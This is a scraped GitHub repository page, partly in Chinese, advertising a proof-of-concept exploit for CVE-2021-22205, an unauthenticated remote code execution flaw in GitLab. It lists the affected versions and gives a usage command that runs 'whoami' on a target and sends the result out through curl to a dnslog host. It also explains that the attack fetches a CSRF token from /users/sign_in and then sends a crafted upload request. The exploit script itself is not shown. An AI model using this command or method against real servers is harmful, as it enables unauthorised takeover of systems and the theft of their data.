code-scan starred CVE-2021-22205
2021-10-29 05:33:48 Author: github.com(查看原文) 阅读量:140 收藏

main
Switch branches/tags

1 branch 0 tags

Code

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

影响版本:

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

Usage

python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Xnip2021-10-28_21-54-04

获取csrf-token:

Xnip2021-10-28_21-44-31

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce

Xnip2021-10-28_21-43-13

ref:

About

CVE-2021-22205 Unauthorized RCE

Resources

Readme

Releases

No releases published

Packages

No packages published

Languages


文章来源: https://github.com/r0eXpeR/CVE-2021-22205
如有侵权请联系:admin#unsafe.sh